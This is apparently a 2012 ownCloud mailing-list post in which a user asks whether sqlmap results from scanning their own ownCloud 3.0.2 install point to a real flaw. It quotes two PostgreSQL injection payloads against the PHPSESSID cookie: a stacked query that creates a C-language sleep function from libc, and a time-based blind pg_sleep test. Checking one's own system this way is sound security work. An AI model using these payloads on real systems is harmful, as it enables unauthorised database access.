[Owncloud] This is the actual vulnerability?
saymon
saymon at hub21.ru
Sun May 6 16:41:19 UTC 2012
Hi all.
We decided to check the security of my ownCloud with different scanners. When
testing with sqlmap, we were faced with the following:
sqlmap identified the following injection points with a total of 16640
HTTP(s) requests:
---
Place: Cookie
Parameter: PHPSESSID
Type: stacked queries
Title: PostgreSQL < 8.2 stacked queries (Glibc)
Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))); CREATE OR REPLACE
FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C'
STRICT; SELECT sleep(5);-- AND ((("JEUt"="JEUt
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))) AND 1939=(SELECT
1939 FROM PG_SLEEP(5)) AND ((("YsVe"="YsVe
---
Is this an actual vulnerability? ownCloud v3.0.2